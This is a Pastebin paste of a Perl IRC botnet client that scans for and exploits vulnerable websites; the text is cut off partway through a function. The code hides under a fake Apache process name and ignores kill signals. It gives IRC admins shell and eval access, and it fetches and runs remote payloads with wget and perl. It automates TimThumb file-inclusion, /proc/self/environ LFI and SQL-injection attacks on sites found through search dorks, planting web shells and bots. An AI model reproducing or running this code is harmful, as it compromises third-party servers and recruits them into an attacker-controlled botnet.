API tools faq
paste
sirnon

as

sirnon
Apr 22nd, 2012
180
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 38.86 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl
  2. #################################################
  3. $powered="jembot"; #
  4. $mail="root@jem.bot"; #
  5. #################################################
  6. #################PERL MODULES####################
  7. use HTTP::Request; #
  8. use HTTP::Request::Common; #
  9. use HTTP::Request::Common qw(POST); #
  10. use LWP::Simple; #
  11. use LWP 5.53; #
  12. use LWP::UserAgent; #
  13. use Socket; #
  14. use IO::Socket; #
  15. use IO::Socket::INET; #
  16. use IO::Select; #
  17. use URI::URL; #
  18. ################BASIC CONNECTING#################
  19. my $datetime = localtime; #
  20. my $fakeproc = "/usr/sbin/apache45"; #
  21. my $ircserver = "irc.byroe.net"; #
  22. my $ircport = "6667"; #
  23. my $nickname = "ef-{".int(rand(100))."}"; #
  24. my $ident = "HAcKeD"; #
  25. my $channel = "#non"; #
  26. my $admin = "Egypt-Hacker"; #
  27. my $fullname = "INFO"; #
  28. #################################################
  29. ####################LOGO####################################
  30. my $nob0dy = "15(9@13nob0dy15)"; #
  31. my $vulN = "15(9@6VuLn!15)"; #
  32. my $thumblogo = "15(9@11ThuMB15)"; #
  33. my $sqllogo = "15(9@11SQL15)"; #
  34. my $lfilogo = "15(9@11Lfi15)"; #
  35. ##################COMMAND####################################
  36. my $thumbcmd = '!thumb'; #
  37. my $sqlcmd = '!sql'; #
  38. my $lficmd = '!lfi'; #
  39. ##################INJECTOR########################################
  40. my $injector = "http://pastebin.com/raw.php?i=izAyQE2f"; #
  41. my $thumbshell = "http://picasa.com.nabbc.org/w00t.php"; #
  42. my $bot = "http://picasa.com.nabbc.org/bot.php"; #
  43. my $lfiinjector = "http://pastebin.com/raw.php?i=ukHveP61"; #
  44. my $shellbot = "http://picasa.com.nabbc.org/r0x"; #
  45. ##################################################################
  46. ########################################TIMTHUMB PATH#######################################################
  47. my $folder1 = "/cache/35bac048e7c81f26c86c56ed8178e44f.php"; #
  48. my $folder2 = "/cache/external_35bac048e7c81f26c86c56ed8178e44f.php"; #
  49. my $folder3 = "/temp/35bac048e7c81f26c86c56ed8178e44f.php"; #
  50. my $folder4 = "/temp/external_35bac048e7c81f26c86c56ed8178e44f.php"; #
  51. my $folder5 = "/wp-content/uploads/thumb-temp/35bac048e7c81f26c86c56ed8178e44f.php"; #
  52. my $bot1 = "/cache/5291c5d1b8b6fb1c761b1e96b0c3f0ee.php"; #
  53. my $bot2 = "/cache/external_5291c5d1b8b6fb1c761b1e96b0c3f0ee.php"; #
  54. my $bot3 = "/temp/5291c5d1b8b6fb1c761b1e96b0c3f0ee.php"; #
  55. my $bot4 = "/temp/external_5291c5d1b8b6fb1c761b1e96b0c3f0ee.php"; #
  56. my $bot5 = "/wp-content/uploads/thumb-temp/5291c5d1b8b6fb1c761b1e96b0c3f0ee.php"; # #
  57. ############################################################################################################
  58. my @uagents = ("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6");
  59. my $uagent = $uagents[rand(scalar(@uagents))];
  60.  
  61. $SIG{'INT'} = 'IGNORE';
  62. $SIG{'HUP'} = 'IGNORE';
  63. $SIG{'TERM'} = 'IGNORE';
  64. $SIG{'CHLD'} = 'IGNORE';
  65. $SIG{'PS'} = 'IGNORE';
  66. $ircserver = "$ARGV[0]" if $ARGV[0];
  67. $0 = "$fakeproc"."\0" x 16;;
  68. my $pid = fork;
  69. exit if $pid;
  70. die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);
  71.  
  72. our %irc_servers;
  73. our %DCC;
  74. my $dcc_sel = new IO::Select->new();
  75. $sel_client = IO::Select->new();
  76. sub sendraw {
  77. if ($#_ == '1') {
  78. my $socket = $_[0];
  79. print $socket "$_[1]\n";
  80. } else {
  81. print $IRC_cur_socket "$_[0]\n";
  82. }
  83. }
  84.  
  85. sub connector {
  86. my $mynick = $_[0];
  87. my $ircserver_con = $_[1];
  88. my $ircport_con = $_[2];
  89. my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
  90. if (defined($IRC_socket)) {
  91. $IRC_cur_socket = $IRC_socket;
  92. $IRC_socket->autoflush(1);
  93. $sel_client->add($IRC_socket);
  94. $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
  95. $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
  96. $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  97. $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
  98. nick("$mynick");
  99. my $versi = "15[!]11TimThumB bot 04(09,01s4l1ty04) 15[!]";
  100. sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$versi");
  101. sleep (1);}}
  102. sub parse {
  103. my $servarg = shift;
  104. if ($servarg =~ /^PING \:(.*)/) {
  105. sendraw("PONG :$1");
  106. }
  107. elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
  108. if (lc($1) eq lc($mynick)) {
  109. $mynick = $4;
  110. $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  111. }
  112. }
  113. elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
  114. nick("$mynick".int rand(1));
  115. }
  116. elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
  117. $mynick = $2;
  118. $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  119. $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  120. sendraw("MODE $mynick +iB");
  121. sendraw("JOIN $channel");
  122. sleep(2);
  123. sendraw("PRIVMSG $channel :14[04!14]11TimhuMB BoT 09,01Up09...04!");
  124. }
  125. }
  126. my $line_temp;
  127. while( 1 ) {
  128. while (!(keys(%irc_servers))) { &connector("$nickname", "$ircserver", "$ircport"); }
  129. select(undef, undef, undef, 0.01);;
  130. delete($irc_servers{''}) if (defined($irc_servers{''}));
  131. my @ready = $sel_client->can_read(0);
  132. next unless(@ready);
  133. foreach $fh (@ready) {
  134. $IRC_cur_socket = $fh;
  135. $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
  136. $nread = sysread($fh, $ircmsg, 4096);
  137. if ($nread == 0) {
  138. $sel_client->remove($fh);
  139. $fh->close;
  140. delete($irc_servers{$fh});
  141. }
  142. @lines = split (/\n/, $ircmsg);
  143. $ircmsg =~ s/\r\n$//;
  144.  
  145. if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
  146. my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);
  147. my $engine ="GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio,WebDe,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo,BLacK,oNeT,SiZuka,WaLLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR,DooGatE,sogou,interia,snz,yandex,joeant,terra,youdao,amfibi,bigclique,dancefloor,live,rakuten,biglobe,nova,najdi,goo,uksubmit,excite";
  148. if ($path eq $mynick) {
  149. if ($msg =~ /^PING (.*)/) {
  150. sendraw("NOTICE $nick :PING $1");
  151. }
  152. if ($msg =~ /^VERSION/) {
  153. sendraw("NOTICE $nick :VERSION TimThumb Bot scanner by s4l1ty");
  154. }
  155. if ($msg =~ /^TIME/) {
  156. sendraw("NOTICE $nick :TIME ".$datetime."");
  157. }
  158. if (&isAdmin($nick) && $msg eq "!die") {
  159. &shell("$path","kill -9 $$");
  160. }
  161. if (&isAdmin($nick) && $msg eq "!killall") {
  162. &shell("$path","killall -9 perl;wget http://picasa.com.nabbc.org/r0x -O paste.jpg;perl paste.jpg;rm paste.jpg");
  163. }
  164. if (&isAdmin($nick) && $msg eq "!reset") {
  165. sendraw("QUIT :Restarting...");
  166. }
  167. if (&isAdmin($nick) && $msg eq "!rehash") {
  168. sendraw("QUIT : Rehasing...");
  169. &shell("$path","kill -9 $$;perl '.$0");
  170. }
  171. if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
  172. sendraw("JOIN #".$1);
  173. }
  174. if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
  175. sendraw("PART #".$1);
  176. }
  177. if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {
  178. sendraw("NICK ".$1);
  179. }
  180. if (&isAdmin($nick) && $msg =~ /^!pid/) {
  181. sendraw($IRC_cur_socket, "PRIVMSG $nick :09Fake Process/PID :04 $fakeproc - 11,01$$");
  182. }
  183. if (&isAdmin($nick) && $msg !~ /^!/) {
  184. &shell("$nick","$msg");
  185. }
  186. }
  187. else {
  188. if (&isAdmin($nick) && $msg eq "!die") {
  189. &shell("$path","kill -9 $$");
  190. }
  191. if (&isAdmin($nick) && $msg eq "!killall") {
  192. &shell("$path","killall -9 perl;wget http://picasa.com.nabbc.org/r0x -O paste.jpg;perl paste.jpg;rm paste.jpg");
  193. }
  194. if (&isAdmin($nick) && $msg eq "!reset") {
  195. sendraw("QUIT :Restarting...");
  196. }
  197. if (&isAdmin($nick) && $msg eq "!rehash") {
  198. sendraw("QUIT : Rehasing...");
  199. &shell("$path","kill -9 $$;perl '.$0");
  200. }
  201. if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
  202. sendraw("JOIN #".$1);
  203. }
  204. if (&isAdmin($nick) && $msg eq "!part") {
  205. sendraw("PART $path");
  206. }
  207. if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
  208. sendraw("PART #".$1);
  209. }
  210. if (&isAdmin($nick) && $msg =~ /^\.x (.*)/) {
  211. &shell("$path","$1");
  212. }
  213. if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {
  214. &shell("$path","$1");
  215. }
  216. if (&isAdmin($nick) && $msg =~ /^!eval (.*)/) {
  217. eval "$1";
  218. }
  219.  
  220. ##################################################################### HELP COMMAND
  221.  
  222. if ($msg=~ /^!help/) {
  223. my $helplogo = "15(14@03Help15";
  224. &msg("$path","$helplogo 15 #####################4[HELP]15##############################");
  225. &msg("$path","$helplogo 03 ( $sqlcmd [bug][dork] ) sql scan ");
  226. &msg("$path","$helplogo 03 ( $thumbcmd [bug][dork] ) TimThumb scan ");
  227. &msg("$path","$helplogo 03 ( $lficmd [bug][dork] ) TimThumb scan ");
  228. &msg("$path","$helplogo 15 6END HELP ===>");
  229. }
  230. if ($msg=~ /^!engine/) {
  231. my $enginelogo = "06(09@11eNgine6)";
  232. &msg("$path","$enginelogo 04GooGLe,Bing,ALtaViSTa,AsK,UoL,YahOo.");
  233. &msg("$path","$enginelogo 04Will Be Updated as soon");
  234. }
  235. if ($msg=~ /^!about/) {
  236. my $aboutlogo = "15(09@11About15)";
  237. &msg("$path","$aboutlogo 09,01Priv8 Bot 11v0.13");
  238. &msg("$path","$aboutlogo 09,01© Copy Right 2012 04s4l1ty");
  239. }
  240. if ($msg=~ /^!version/) {
  241. my $versionlogo = "15(09@11Version15)";
  242. &msg("$path","$versionlogo 13,11WordPress,Sql,Lfi 04fucker");
  243. }
  244. if ($msg=~ /^!respon/ || $msg=~ /^!id/) {
  245. if (&isFound($lfiinjector,"str_rot13")) {
  246. &msg("$path","15,1(9@11Injector15 => 4Ready!!!");
  247. } else {
  248. &msg("$path","15,01(09@11Injector15 => 12Undetected.");
  249. }
  250. }
  251. if (&isAdmin($nick) && $msg =~ /^!pid/) {
  252. &notice("$nick","PRIVMSG $nick :09Fake Process/PID :04 $fakeproc - 11,01$$");
  253. }
  254.  
  255. #####################################################################
  256. if ($msg=~ /^!port\s+(.*?)\s+(.*)/ ) {
  257. my $hostip= "$1";
  258. my $portsc= "$2";
  259. my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $portsc, Proto =>'tcp', Timeout => 7);
  260. if ($scansock) {
  261. &msg("$path","15(9@11PORT15)7 $hostip : $portsc 9Accepted");
  262. }
  263. else {
  264. &msg("$path","15(9@11PORT15)7 $hostip : $portsc 4connection refused");
  265. }
  266. }
  267.  
  268. if ($msg=~ /^!ip\s+(.*)/ ) {
  269. if (my $pid = fork) { waitpid($pid, 0); } else {
  270. if (fork) { exit; } else {
  271. my $ip = $1;
  272. &msg("$path","15(9@11IP15)7 Searching ".$ip." 6Location ...");
  273. my $website = "http://www.ipligence.com/geolocation";
  274. my ($useragent,$request,$response,%form);
  275. undef %form;
  276. $form{ip} = $ip;
  277. $useragent = LWP::UserAgent->new;
  278. $useragent->timeout(5);
  279. $request = POST $website,\%form;
  280. $response = $useragent->request($request);
  281. if ($response->is_success) {
  282. my $res = $response->content;
  283. if ($res =~ m/Your IP address is(.*)<br>City:(.*)<br\/>Country:(.*)<br>Continent:(.*)<br>Time/g) {
  284. my ($ipaddress,$city,$country,$continent) = ($1,$2,$3,$4);
  285. &msg("$path","15(9@11IP15)7IP Address : ".$ip."15 (9".$ipaddress."15 )");
  286. &msg("$path","15(9@11IP15)7 City : ".$ip."15 (9".$city."15 )");
  287. &msg("$path","15(9@11IP15)7 Country : ".$ip."15 (9".$country."15 )");
  288. &msg("$path","15(9@11IP15)7 Continent : ".$ip."15 (9".$continent."15 )");
  289. }
  290. else {
  291. &msg("$path","15(9@11IP15)7 ".$ip." 6not found in database");
  292. }
  293. }
  294. else {
  295. &msg("$path","15(9@11IP15)4 Cannot open IP database.");
  296. }
  297. }
  298. exit;
  299. }
  300. }
  301.  
  302. if ($msg=~ /^!base64 (.*)$/ ) {
  303. if (my $pid = fork) { waitpid($pid, 0); } else {
  304. if (fork) { exit; } else {
  305. my $hash = $1;
  306. my $base64_encoded = encode_base64($hash);
  307. my $base64_decoded = decode_base64($hash);
  308. &msg("$path","15(9@11BASE6415)12 Decode : $base64_decoded");
  309. &msg("$path","15(9@11BASE6415)12 Encode : $base64_encoded");
  310. }
  311. exit;
  312. }
  313. }
  314. ##############################################################################
  315.  
  316. if ($msg=~ /^$thumbcmd\s+(.+?)\s+(.*)/) {
  317. if (my $pid = fork) {
  318. waitpid($pid, 0);
  319. }
  320. else {
  321. if (fork) { exit; } else {
  322. my ($bug,$dork) = ($1,$2);
  323. &msg("$path","$thumblogo 6Dork :11 $dork");
  324. &msg("$path","$thumblogo 11Bugz :6 $bug");
  325. &msg("$path","$thumblogo 4Working.!!!");
  326. &timthumb_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo");
  327. }
  328. exit;
  329. }
  330. }
  331. #####################################################################
  332. if ($msg=~ /^$sqlcmd\s+(.+?)\s+(.*)/) {
  333. if (my $pid = fork) {
  334. waitpid($pid, 0);
  335. }
  336. else {
  337. if (fork) { exit; } else {
  338. my ($bug,$dork) = ($1,$2);
  339. &msg("$path","$sqllogo 6Dork :11 $dork");
  340. &msg("$path","$sqllogo 11Bugz :6 $bug");
  341. &msg("$path","$sqllogo 4Working.!!!");
  342. &sql_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo");
  343. }
  344. exit;
  345. }
  346. }
  347. #####################################################################
  348. if ($msg=~ /^$lficmd\s+(.+?)\s+(.*)/) {
  349. if (my $pid = fork) {
  350. waitpid($pid, 0);
  351. }
  352. else {
  353. if (fork) { exit; } else {
  354. my ($bug,$dork) = ($1,$2);
  355. &msg("$path","$lfilogo 6Dork :11 $dork");
  356. &msg("$path","$lfilogo 11Bugz :6 $bug");
  357. &msg("$path","$lfilogo 4Working.!!!");
  358. &lfi_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo");
  359. }
  360. exit;
  361. }
  362. }
  363. #####################################################################
  364.  
  365. }
  366. }
  367.  
  368. for(my $c=0; $c<= $#lines; $c++) {
  369. $line = $lines[$c];
  370. $line = $line_temp.$line if ($line_temp);
  371. $line_temp = '';
  372. $line =~ s/\r$//;
  373. unless ($c == $#lines) {
  374. parse("$line");
  375. } else {
  376. if ($#lines == 0) {
  377. parse("$line");
  378. } elsif ($lines[$c] =~ /\r$/) {
  379. parse("$line");
  380. } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
  381. parse("$line");
  382. } else {
  383. $line_temp = $line;
  384. }
  385. }
  386. }
  387. }
  388. }
  389. #########################################
  390. sub timthumb_start() {
  391. my $chan = $_[0];
  392. my $bug = $_[1];
  393. my $dork = $_[2];
  394. my $engine = $_[3];
  395. if ($engine =~ /google/i) {
  396. if (my $pid = fork) { waitpid($pid, 0); }
  397. else { if (fork) { exit; } else {
  398. &thumb($chan,$bug,$dork,"GooGLe");
  399. } exit; }
  400. }
  401. if ($engine =~ /alltheweb/i) {
  402. if (my $pid = fork) { waitpid($pid, 0); }
  403. else { if (fork) { exit; } else {
  404. &thumb($chan,$bug,$dork,"AllTheWeb");
  405. } exit; }
  406. }
  407. if ($engine =~ /bing/i) {
  408. if (my $pid = fork) { waitpid($pid, 0); }
  409. else { if (fork) { exit; } else {
  410. &thumb($chan,$bug,$dork,"Bing");
  411. } exit; }
  412. }
  413. if ($engine =~ /altavista/i) {
  414. if (my $pid = fork) { waitpid($pid, 0); }
  415. else { if (fork) { exit; } else {
  416. &thumb($chan,$bug,$dork,"ALtaViSTa");
  417. } exit; }
  418. }
  419. if ($engine =~ /ask/i) {
  420. if (my $pid = fork) { waitpid($pid, 0); }
  421. else { if (fork) { exit; } else {
  422. &thumb($chan,$bug,$dork,"AsK");
  423. } exit; }
  424. }
  425. if ($engine =~ /uol/i) {
  426. if (my $pid = fork) { waitpid($pid, 0); }
  427. else { if (fork) { exit; } else {
  428. &thumb($chan,$bug,$dork,"UoL");
  429. } exit; }
  430. }
  431. if ($engine =~ /yahoo/i) {
  432. if (my $pid = fork) { waitpid($pid, 0); }
  433. else { if (fork) { exit; } else {
  434. &thumb($chan,$bug,$dork,"YahOo");
  435. } exit; }
  436. }
  437. }
  438.  
  439. #########################################
  440. sub sql_start() {
  441. my $chan = $_[0];
  442. my $bug = $_[1];
  443. my $dork = $_[2];
  444. my $engine = $_[3];
  445. if ($engine =~ /google/i) {
  446. if (my $pid = fork) { waitpid($pid, 0); }
  447. else { if (fork) { exit; } else {
  448. &sql($chan,$bug,$dork,"GooGLe");
  449. } exit; }
  450. }
  451. if ($engine =~ /alltheweb/i) {
  452. if (my $pid = fork) { waitpid($pid, 0); }
  453. else { if (fork) { exit; } else {
  454. &sql($chan,$bug,$dork,"AllTheWeb");
  455. } exit; }
  456. }
  457. if ($engine =~ /bing/i) {
  458. if (my $pid = fork) { waitpid($pid, 0); }
  459. else { if (fork) { exit; } else {
  460. &sql($chan,$bug,$dork,"Bing");
  461. } exit; }
  462. }
  463. if ($engine =~ /altavista/i) {
  464. if (my $pid = fork) { waitpid($pid, 0); }
  465. else { if (fork) { exit; } else {
  466. &sql($chan,$bug,$dork,"ALtaViSTa");
  467. } exit; }
  468. }
  469. if ($engine =~ /ask/i) {
  470. if (my $pid = fork) { waitpid($pid, 0); }
  471. else { if (fork) { exit; } else {
  472. &sql($chan,$bug,$dork,"AsK");
  473. } exit; }
  474. }
  475. if ($engine =~ /uol/i) {
  476. if (my $pid = fork) { waitpid($pid, 0); }
  477. else { if (fork) { exit; } else {
  478. &sql($chan,$bug,$dork,"UoL");
  479. } exit; }
  480. }
  481. if ($engine =~ /yahoo/i) {
  482. if (my $pid = fork) { waitpid($pid, 0); }
  483. else { if (fork) { exit; } else {
  484. &sql($chan,$bug,$dork,"YahOo");
  485. } exit; }
  486. }
  487. }
  488.  
  489. #########################################
  490. sub lfi_start() {
  491. my $chan = $_[0];
  492. my $bug = $_[1];
  493. my $dork = $_[2];
  494. my $engine = $_[3];
  495. if ($engine =~ /google/i) {
  496. if (my $pid = fork) { waitpid($pid, 0); }
  497. else { if (fork) { exit; } else {
  498. &lfi($chan,$bug,$dork,"GooGLe");
  499. } exit; }
  500. }
  501. if ($engine =~ /alltheweb/i) {
  502. if (my $pid = fork) { waitpid($pid, 0); }
  503. else { if (fork) { exit; } else {
  504. &lfi($chan,$bug,$dork,"AllTheWeb");
  505. } exit; }
  506. }
  507. if ($engine =~ /bing/i) {
  508. if (my $pid = fork) { waitpid($pid, 0); }
  509. else { if (fork) { exit; } else {
  510. &lfi($chan,$bug,$dork,"Bing");
  511. } exit; }
  512. }
  513. if ($engine =~ /altavista/i) {
  514. if (my $pid = fork) { waitpid($pid, 0); }
  515. else { if (fork) { exit; } else {
  516. &lfi($chan,$bug,$dork,"ALtaViSTa");
  517. } exit; }
  518. }
  519. if ($engine =~ /ask/i) {
  520. if (my $pid = fork) { waitpid($pid, 0); }
  521. else { if (fork) { exit; } else {
  522. &lfi($chan,$bug,$dork,"AsK");
  523. } exit; }
  524. }
  525. if ($engine =~ /uol/i) {
  526. if (my $pid = fork) { waitpid($pid, 0); }
  527. else { if (fork) { exit; } else {
  528. &lfi($chan,$bug,$dork,"UoL");
  529. } exit; }
  530. }
  531. if ($engine =~ /yahoo/i) {
  532. if (my $pid = fork) { waitpid($pid, 0); }
  533. else { if (fork) { exit; } else {
  534. &lfi($chan,$bug,$dork,"YahOo");
  535. } exit; }
  536. }
  537. }
  538. #########################################
  539. sub lfi() {
  540. my $chan = $_[0];
  541. my $bug = $_[1];
  542. my $dork = $_[2];
  543. my $engine = $_[3];
  544. my $count = 0;
  545. my @list = &search_engine($chan,$bug,$dork,$engine,$lfilogo);
  546. my $num = scalar(@list);
  547. if ($num > 0) {
  548. foreach my $site (@list) {
  549. $count++;
  550. if ($count == $num-1) { &msg("$chan","$lfilogo15(9@7$engine15)10 Scan finish..."); }
  551. my $dir = "../../../../../../../../../../../../../../../";
  552. my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";
  553. my $vuln = "http://".$site.$bug.$dir."09/proc/self/environ%0000";
  554. my $shell = "http://".$site.$bug.$dir."04/tmp/Crash%0000";
  555. my $html = get_content($test);
  556. if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT=/) {
  557. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  558. my $code = 'echo "s4l1ty#".php_uname()."#s4l1ty"; if(@copy("'.$lfiinjector.'","/tmp/Crash")) { echo "SUCCESS"; }';
  559. my $res = lfi_env_query($test,encode_base64($code));
  560. $res =~ s/\n//g;
  561. if ($res =~ /s4l1ty#(.*)#s4l1tySUCCESS/sg) {
  562. my $sys = $1;
  563. &msg("$chan","$lfilogo15(09@03$engine15)04 ".$shell." 15(9@3".$sys."15)$vulN");
  564. sleep(4);
  565. }
  566. elsif ($res =~ /s4l1ty#(.*)#s4l1ty/sg) {
  567. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  568. my $sys = $1;
  569. my $upload = 'system("wget '.$lfiinjector.' -O /tmp/Crash");';
  570. my $upload1 = 'system("wget '.$botshell.' -O /tmp/w00t");';
  571. my $wget = lfi_env_query($test,encode_base64($upload)); sleep(2);
  572. my $wget1 = lfi_env_query($test,encode_base64($upload1)); sleep(2);
  573. my $check = get_content("http://".$site.$bug.$dir."/tmp/Crash%0000"); sleep(1);
  574. if ($check =~ /Hijacked by s4l1ty/) {
  575. &msg("$admin","$lfilogo15(09@03$engine15)04 ".$shell." 15(9@3".$sys."15)$vulN");
  576. sleep(2);
  577. }
  578. else {
  579. &msg("$chan","$lfilogo15(09@3$engine15)15(09@04SysTem15)4 ".$vuln." 15(09@03".$sys."15)$vulN");
  580. sleep(2);
  581. }
  582. } exit; }
  583. }
  584. else { &msg("$chan","$lfilogo15(09@3$engine15)15(09@06eNviRon15)06 ".$vuln.""); }
  585. } exit; } sleep(2);
  586. }
  587. }
  588. }
  589. }
  590. #########################################
  591. sub sql() {
  592. my $chan = $_[0];
  593. my $bug = $_[1];
  594. my $dork = $_[2];
  595. my $engine = $_[3];
  596. my $count = 0;
  597. my @list = &search_engine($chan,$bug,$dork,$engine,$sqllogo);
  598. my $num = scalar(@list);
  599. if ($num > 0) {
  600. foreach my $site (@list) {
  601. $count++;
  602. if ($count == $num-1) { &msg("$chan","$sqllogo15(9@7$engine15)10 Scan finish..."); }
  603. my $test = "http://".$site.$bug."'";
  604. my $vuln = "http://".$site.$bug;
  605. my $sqlsite = "http://".$site.$bug;
  606. my $html = &get_content($test);
  607. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  608. if ($html =~ m/You have an error in your SQL syntax/i || $html =~ m/Query failed/i || $html =~ m/SQL query failed/i ) {
  609. &msg("$chan","$sqllogo15(04@3$engine15)15(09@04MySQL15) 03,01".$vuln);}
  610. elsif ($html =~ m/ODBC SQL Server Driver/i || $html =~ m/Unclosed quotation mark/i || $html =~ m/Microsoft OLE DB Provider for/i ) {
  611. &msg("$chan","$sqllogo15(04@3$engine15)15(09@04MsSQL15) 03,01".$vuln);}
  612. elsif ($html =~ m/Microsoft JET Database/i || $html =~ m/ODBC Microsoft Access Driver/i || $html =~ m/Microsoft OLE DB Provider for Oracle/i ) {
  613. &msg("$chan","$sqllogo15(4@3$engine15)15(09@04MsAccess15) 03,01".$vuln);}
  614. elsif ($html =~ m/mysql_/i || $html =~ m/Division by zero in/i || $html =~ m/mysql_fetch_array/i ) {
  615. } exit; sleep(2); }
  616. }
  617. }
  618. }
  619. }
  620. #########################################
  621. sub thumb() {
  622. my $chan = $_[0];
  623. my $bug = $_[1];
  624. my $dork = $_[2];
  625. my $engine = $_[3];
  626. my $count = 0;
  627. my @list = &search_engine($chan,$bug,$dork,$engine,$thumblogo);
  628. my $num = scalar(@list);
  629. if ($num > 0) {
  630. foreach my $site (@list) {
  631. $count++;
  632. if ($count == $num-1) {
  633. &msg("$chan","$thumblogo 15(09@03$engine15)2 Scan finish...");
  634. }
  635. my $vuln = "http://".$site.$bug."?src=".$thumbshell;
  636. my $bot = "http://".$site.$bug."?src=".$bot;
  637. my $cek = &get_content($vuln);sleep(2);&get_content($bot);sleep(2);
  638. if ($cek =~ /Unable to /i) {
  639. (my $tpath = $bug)=~ s{/[^/]+\z}{};
  640. my $vuln2 = "http://".$site.$tpath.$folder1;
  641. my $vuln3 = "http://".$site.$tpath.$folder2;
  642. my $vuln4 = "http://".$site.$tpath.$folder3;
  643. my $vuln5 = "http://".$site.$tpath.$folder4;
  644. my $vuln6 = "http://".$site.$folder5;
  645. my $exbot1 = "http://".$site.$tpath.$bot1;
  646. my $exbot2 = "http://".$site.$tpath.$bot2;
  647. my $exbot3 = "http://".$site.$tpath.$bot3;
  648. my $exbot4 = "http://".$site.$tpath.$bot4;
  649. my $exbot5 = "http://".$site.$bot5;
  650. my $runbot1 = &get_content($exbot1);sleep(3);
  651. my $runbot2 = &get_content($exbot2);sleep(3);
  652. my $runbot3 = &get_content($exbot3);sleep(3);
  653. my $runbot4 = &get_content($exbot4);sleep(2);
  654. my $runbot5 = &get_content($exbot5);sleep(2);
  655. my $backup = &get_content($runing);sleep(3);
  656. my $check1 = &get_content($vuln2);sleep(2);
  657. my $check2 = &get_content($vuln3);sleep(2);
  658. my $check3 = &get_content($vuln4);sleep(2);
  659. my $check4 = &get_content($vuln5);sleep(2);
  660. my $check5 = &get_content($vuln6);sleep(2);
  661. my $os = "";
  662. my $free = "";
  663. my $uid = "";
  664. if ($check1 =~ /JANCOK- exploit/i) {
  665. if ($check1 =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
  666. if ($check1 =~ m/Total space: <b>(.*?)<\/b><br>/) {$free = $1;}
  667. if ($check1 =~ m/uid=(.*?)gid=/) {$uid = $1;}
  668. &msg("$admin","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln2."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
  669. &msg("$chan","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln2."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
  670. }
  671. if ($check2 =~ /JANCOK- exploit/i) {
  672. if ($check2 =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
  673. if ($check2 =~ m/Total space: <b>(.*?)<\/b><br>/) {$free = $1;}
  674. if ($check2 =~ m/uid=(.*?)gid=/) {$uid = $1;}
  675. &msg("$admin","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln3."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
  676. &msg("$chan","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln3."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
  677. }
  678. if ($check3 =~ /JANCOK- exploit/i) {
  679. if ($check3 =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
  680. if ($check3 =~ m/Total space: <b>(.*?)<\/b><br>/) {$free = $1;}
  681. if ($check3 =~ m/uid=(.*?)gid=/) {$uid = $1;}
  682. &msg("$admin","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln4."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
  683. &msg("$chan","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln4."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
  684. }
  685. if ($check4 =~ /JANCOK- exploit/i) {
  686. if ($check4 =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
  687. if ($check4 =~ m/Total space: <b>(.*?)<\/b><br>/) {$free = $1;}
  688. if ($check4 =~ m/uid=(.*?)gid=/) {$uid = $1;}
